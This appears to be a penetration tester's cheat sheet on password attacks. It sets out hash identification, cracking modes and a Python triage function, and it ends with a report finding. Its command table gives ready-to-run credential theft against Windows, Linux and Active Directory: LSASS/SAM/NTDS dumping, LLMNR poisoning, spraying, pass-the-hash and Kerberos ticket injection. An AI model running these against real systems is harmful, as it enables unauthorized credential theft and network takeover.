Methodology Checklist
- Identify hash type before cracking: `hashid [HASH]` or the Hashcat example-hashes page
- John crack: `john --wordlist=[WORDLIST] [HASH_FILE]`
- Hashcat crack: `hashcat -m [MODE] [HASH_FILE] [WORDLIST]`
- Custom rules: `john --rules=[RULE] --wordlist=[WORDLIST] [HASH_FILE]`
- Network spray: check policy → spray with NXC/Kerbrute
- Protected file: convert with `zip2john`/`keepass2john`, then crack
- Archive: `zip2john`, `rar2john` → John
- Document all cracked credentials with hash and method used
Operational Context
Use when: Quick reference for password attack tool selection → match attack type to tool and command.

Think Dumber First: Order of operations: default creds → credential stuffing (if breach data available) → spray (1 pass per 30 min) → targeted brute. Never skip to full brute force without trying the targeted approaches first.

Skip when: N/A → reference document.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| `hashid -j [HASH]` | Identify hash type + John format flag |
| `hashid -m [HASH]` | Identify hash type + Hashcat mode ID |
| `hashcat --help \| grep -i "[PROTOCOL]"` | Search Hashcat modes by name |
| `sudo tcpdump -i [IFACE] -v -w capture.pcap` | Capture network traffic to file |
| `sudo tcpdump -i [IFACE] -A \| grep -i "pass" --color=auto` | Live traffic grep for credentials |
| `sudo tcpdump -i [IFACE] port 21 or port 23 or port 80 -w capture.pcap` | Capture only cleartext protocol ports |
| `netsh trace start capture=yes tracefile=C:\trace.etl` | Windows: start network capture |
| `netsh trace stop` | Windows: stop network capture |
| `sudo responder -I [IFACE] -v` | LLMNR/NBT-NS/mDNS poisoning to capture hashes |
| `Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTPS Y -Proxy Y` | Windows-side hash poisoning (PowerShell) |
| `findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml` | Hunt credentials in Windows files |
| `for l in .conf .config .cnf; do find / -name "*$l" 2>/dev/null \| grep -Ev "lib\|fonts\|share\|core"; done` | Hunt config files in Linux (`-E` so the `\|` alternation is a regex, not a literal string) |
| `C:\Temp\lazagne.exe all` | Windows: dump all stored credentials |
| `sudo python2.7 laZagne.py all` | Linux: dump all stored credentials |
| `sudo python3 mimipenguin.py` | Linux: dump cleartext creds from memory |
| `python3 firefox_decrypt.py` | Decrypt Firefox saved credentials |
| `netexec smb [TARGET_IP] -u [USER] -p [PASS] --shares` | List SMB shares with valid credentials |
| `netexec smb [TARGET_IP] -u [USER] -p [PASS] --spider [SHARE] --content --pattern "passw"` | Spider share for credential keywords |
| `Snaffler.exe -s` | Auto-hunt sensitive files across accessible shares |
| `netexec smb [SUBNET]/24 -u [USER_LIST] -p '[PASS]'` | Password spray across subnet |
| `hydra -C [CRED_LIST] ssh://[TARGET_IP]` | Credential stuffing (`-C` = user:pass format) |
| `netexec winrm [TARGET_IP] -u [USER_LIST] -p [PASS_LIST]` | WinRM spray → Pwn3d! = admin access |
| `hydra -L [USER_LIST] -P [PASS_LIST] rdp://[TARGET_IP] -t 4 -W` | RDP brute-force (low thread count) |
| `python3 ssh2john.py [KEY] > ssh.hash && john --wordlist=rockyou.txt ssh.hash` | SSH key hash extraction + crack |
| `zip2john [FILE].zip > zip.hash && john --wordlist=rockyou.txt zip.hash` | ZIP hash extraction + crack |
| `bitlocker2john -i [FILE].vhd \| grep "bitlocker\$0" > bl.hash && hashcat -m 22100 bl.hash rockyou.txt` | BitLocker extraction + crack |
| `hashcat -a 0 -m [ID] [HASH] rockyou.txt -r best64.rule` | Dictionary + best64 rules |
| `hashcat -a 3 -m [ID] [HASH] '?u?l?l?l?l?d?s'` | Mask attack (known pattern) |
| `cewl [URL] -d 4 -m 6 --lowercase -w wordlist.txt` | Generate targeted wordlist from website |
| `reg.exe save hklm\sam C:\sam.save && reg.exe save hklm\system C:\system.save && reg.exe save hklm\security C:\security.save` | Dump registry hives on target |
| `python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL` | Extract hashes from hive files offline |
| `netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --sam` | Remote SAM dump |
| `netexec smb [TARGET_IP] --local-auth -u [USER] -p [PASS] --lsa` | Remote LSA secrets dump |
| `rundll32 comsvcs.dll, MiniDump [PID] C:\lsass.dmp full` | LSASS memory dump (elevated) |
| `pypykatz lsa minidump lsass.dmp` | Parse LSASS dump for all credential types |
| `netexec smb [DC_IP] -u [USER] -p [PASS] -M ntdsutil` | Automated NTDS.dit dump |
| `impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL` | Decrypt domain hashes from NTDS files |
| `impacket-psexec [USER]@[TARGET_IP] -hashes :[NT_HASH]` | PtH shell via impacket |
| `evil-winrm -i [TARGET_IP] -u [USER] -H [NT_HASH]` | PtH WinRM shell |
| `Rubeus.exe asktgt /domain:[DOMAIN] /user:[USER] /rc4:[NT_HASH] /ptt` | OverPass-the-Hash → request + inject TGT |
| `Rubeus.exe ptt /ticket:[FILE].kirbi` | Inject Kerberos ticket into session |
| `export KRB5CCNAME=[FILE].ccache && klist` | Linux: activate stolen Kerberos ticket |
| `impacket-ticketConverter ticket.ccache ticket.kirbi` | Convert ticket between Linux/Windows formats |
| `unshadow passwd.bak shadow.bak > hashes.txt && hashcat -m 1800 hashes.txt rockyou.txt` | Linux: unshadow + crack SHA-512 hashes |
| `kinit [USER]@[DOMAIN] -k -t [FILE].keytab` | Linux: impersonate user via keytab |
| `impacket-ntlmrelayx -t http://[CA_IP]/certsrv/certfnsh.asp --adcs -smb2support --template KerberosAuthentication` | AD CS relay (ESC8) to mint DC certificate |
| `python3 gettgtpkinit.py -cert-pfx [FILE].pfx -dc-ip [DC_IP] [DOMAIN]/[USER] /tmp/ticket.ccache` | Convert .pfx cert to Kerberos TGT |
| `pywhisker --dc-ip [DC_IP] -d [DOMAIN] -u [USER] -p [PASS] --target [TARGET] --action add` | Shadow credentials injection |
Deep Dive & Workflow

Decision Tree: What to Attack First
```text
Have a shell?
├─ Local admin   → SAM/LSASS/NTDS dump → crack or PtH
├─ Domain user   → credential hunting (shares, files, history)
└─ Limited user  → credential hunting + privesc first
Have hashes?
├─ NT hash         → PtH directly (no crack needed)
├─ Kerberos ticket → PtT
└─ Need plaintext  → crack with Hashcat/John
On the network?
├─ Passive          → tcpdump, Wireshark filters
├─ Active poisoning → Responder (LLMNR/NBT-NS)
└─ Share hunting    → Snaffler, NetExec spider, MANSPIDER
```
Identify a Hash on Sight
`hashid`, `haiti` and `hashcat --identify` guess from regexes and are routinely wrong on ambiguous formats (a bare 32-hex string is NTLM, raw MD5 or half-LM: the tool can't know, but where you got it can). Learn to read the hash yourself; the tool is a second opinion, not the answer.
The two patterns that decode most hashes:

- `$id$...` → a Unix crypt / structured hash. The id names the algorithm: `$1$` = md5crypt, `$5$` = sha256crypt, `$6$` = sha512crypt, `$y$` = yescrypt, `$2a$`/`$2b$`/`$2y$` = bcrypt (the two digits after are the cost), `$krb5tgs$`/`$krb5asrep$` = Kerberos, `$keepass$`/`$office$`/`$7z$` = that file format.
- bare hex, no `$` → a raw/Windows hash; length is the tell: 16 hex = LM half, 32 = NTLM/MD5, 40 = SHA1.
| Hash | Tell β recognise on sight | Mode | Where found |
|---|---|---|---|
| NT (NTLM) | 32 hex, no prefix | 1000 | SAM, LSASS, NTDS (user:RID:LM:NT:::) |
| Raw MD5 | 32 hex, no prefix (context says web/DB, not Windows) | 0 | app DBs, params |
| Raw SHA1 | 40 hex, no prefix | 100 | app DBs |
| LM | 32 hex; aad3b435b51404ee... = empty half | 3000 | legacy SAM |
| NetNTLMv2 | user::DOMAIN: + two long blobs, has :: | 5600 | Responder / relay capture |
| NetNTLMv1 | user::HOST: shorter, single-block | 5500 | Responder (downgraded) |
| DCC2 (MS Cache 2) | starts $DCC2$10240#user# | 2100 | SECURITY hive |
| DCC (MS Cache) | hash:domain (no $) | 1100 | SECURITY hive |
| Kerberoast TGS (RC4) | $krb5tgs$23$*user$realm$... | 13100 | GetUserSPNs -request |
| Kerberoast TGS (AES256) | $krb5tgs$18$... | 19700 | GetUserSPNs (AES account) |
| AS-REP roast | $krb5asrep$23$user@domain | 18200 | GetNPUsers (no-preauth) |
| md5crypt | $1$salt$... | 500 | old Linux shadow |
| sha256crypt | $5$... | 7400 | Linux shadow |
| sha512crypt | $6$... | 1800 | Linux shadow (common) |
| yescrypt | $y$... | no hashcat mode → John | modern Debian/Ubuntu/Kali shadow |
| bcrypt | $2a$/$2b$/$2y$NN$... (NN = cost) | 3200 | web app DBs |
| KeePass | $keepass$*1*... | 13400 | .kdbx via keepass2john |
| MS Office 2013 | $office$*2013*... | 9600 | docs via office2john |
| 7-Zip | $7z$0$... | 11600 | archives via 7z2john |
| BitLocker | $bitlocker$... | 22100 | VHD/disk via bitlocker2john |
Gotcha: yescrypt (`$y$`, the default on current Debian/Ubuntu/Kali) has no hashcat mode → crack it with John the Ripper jumbo, not hashcat. (18200 is AS-REP, a common mislabel.)
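The two rules above and the table's mode numbers, written out as a small Python triage function so the ambiguity the text warns about is explicit: a bare hex string returns every plausible reading instead of one guess, and a source hint reorders them. This is an added example, not `hashid` or `haiti` code; the NetNTLMv2 and secretsdump line layouts it matches are assumed from the usual Responder and pwdump-style output.

```python
import re

# $id$ prefixes -> (name, hashcat mode). Modes are the ones in the table above;
# None means "no hashcat mode, use John" (yescrypt).
PREFIXED = {
    "1": ("md5crypt", 500), "5": ("sha256crypt", 7400), "6": ("sha512crypt", 1800),
    "y": ("yescrypt (John only)", None), "krb5asrep": ("AS-REP roast", 18200),
    "DCC2": ("DCC2 / MS Cache 2", 2100), "keepass": ("KeePass", 13400),
    "office": ("MS Office", 9600), "7z": ("7-Zip", 11600), "bitlocker": ("BitLocker", 22100),
}
# Kerberoast: the field after $krb5tgs$ is the Kerberos encryption type (etype).
KRB5TGS_ETYPE = {"23": ("Kerberoast TGS (RC4)", 13100), "18": ("Kerberoast TGS (AES256)", 19700)}
# Bare hex is ambiguous by design: return every plausible reading, most likely first.
BARE_HEX = {
    16: [("LM half", 3000)],
    32: [("NT (NTLM)", 1000), ("raw MD5", 0), ("LM", 3000)],
    40: [("raw SHA1", 100)],
}
# Assumed Responder layout: user::DOMAIN:challenge(16 hex):proof(32 hex):blob
NETNTLMV2 = re.compile(r"[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+")
# Assumed secretsdump/pwdump line: user:RID:LM:NT:::  (the NT field is what gets cracked)
PWDUMP = re.compile(r"[^:]+:\d+:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}:::")


def identify(h, context=""):
    """Return a list of (name, hashcat mode) candidates; [] means unrecognised.
    context is where the hash came from ("web"/"db" vs. default Windows) and is
    used only to break the 32-hex tie the way the text describes."""
    h = h.strip()
    if h.startswith("$"):
        parts = h.split("$")                      # ['', id, next field, ...]
        hid = parts[1]
        if hid == "krb5tgs" and len(parts) > 2:
            return [KRB5TGS_ETYPE.get(parts[2], ("Kerberoast TGS (other etype)", None))]
        if hid in ("2a", "2b", "2y") and len(parts) > 2:
            return [("bcrypt cost " + parts[2], 3200)]   # $2b$12$... -> cost 12
        return [PREFIXED[hid]] if hid in PREFIXED else []
    if PWDUMP.fullmatch(h):
        return [("NT (NTLM) from SAM/NTDS line", 1000)]
    if NETNTLMV2.fullmatch(h):
        return [("NetNTLMv2", 5600)]
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        cands = list(BARE_HEX.get(len(h), []))
        if len(h) == 32 and context.lower() in ("web", "db"):
            cands.sort(key=lambda c: c[1] != 0)  # stable sort: raw MD5 (mode 0) moves first
        return cands
    return []
```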
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Unsure which cracker to use | Multiple options | Use hashcat for GPU cracking; john for CPU/format-auto; not both on same hash |
| Spray lockout triggered | Observation window wrong | Verify policy with --pass-pol first; lockout observation window resets after window expires, not per attempt |
| Default creds list incomplete | Generic list used | Use service-specific defaults: seclists/Passwords/Default-Credentials/ has per-service lists |
| Hash mode unknown | Hash identifier needed | Use: hashcat --identify hash.txt or hash-identifier or haiti hash |
| Attack too slow | CPU/GPU bottleneck | Hashcat GPU required for bcrypt; `john --fork=[CORES]` for CPU parallelism; prioritize SHA1/MD5 first |
Reporting Trigger
Finding Title: Password Attack Methodology Applied Across All Identified Services

Impact: Systematic password attack methodology covering default credentials, spraying, brute force, and hash cracking provides multiple pathways to valid credentials across all exposed services and user accounts.

Root Cause: Absence of MFA, weak password policies, and no anomalous authentication alerting permits methodical password attacks without detection.

Recommendation: Implement MFA across all services. Enforce strong password policy (12+ chars, no dictionary words). Alert on failed authentication patterns consistent with spraying. Implement credential breach monitoring.